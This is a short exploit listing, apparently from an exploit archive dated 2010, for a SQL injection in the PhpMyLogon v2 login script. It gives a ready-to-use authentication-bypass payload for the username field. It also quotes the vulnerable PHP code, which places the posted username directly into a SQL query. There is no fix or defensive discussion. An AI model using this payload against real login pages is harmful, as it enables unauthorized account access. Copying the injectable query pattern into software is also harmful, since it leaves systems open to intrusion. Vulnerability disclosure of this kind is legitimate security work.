PhpMyLogon v2 SQL Injection Vulnerability by h3m4n

VIEWS: 440 PAGES: 1

									                                    PhpMyLogon v2 SQL Injection Vulnerability                                        Page 1/1
  1     #   Exploit Title: PhpMyLogon SQL Injection
  2     #   Date: March 14, 2010
  3     #   Author: Blake
  4     #   Software Link: http://sourceforge.net/projects/phpmylogon/files/PhpMyLogon/PhpMyLogon%202/phpmylogon2.zip/download
  5     #   Version: 2
  6     #   Tested on: Windows XP SP3
  7
  8
  9     Proof of Concept:
  10    Enter the following for the username to login as the first user:
  11    blake’ or ’1’=’1’ #
  12    and anything for the password.
  13
  14    Vulnerable Code:
  15            if(isset($_POST[’submit’])) {
  16                if($_POST[’username’] != "" AND $_POST[’password’] != "") {
  17                     // Check submitted data with data in database
  18                     $sql = "SELECT id,username,password,cookie_pass,actcode,rank FROM ‘".$settings[’db_table’]."‘ WHERE u
        sername = ’".$_POST[’username’]."’ LIMIT 1";
  19                     $query = mysql_query($sql);
  20




Blake                                                                                                                 03/14/2010

								
To top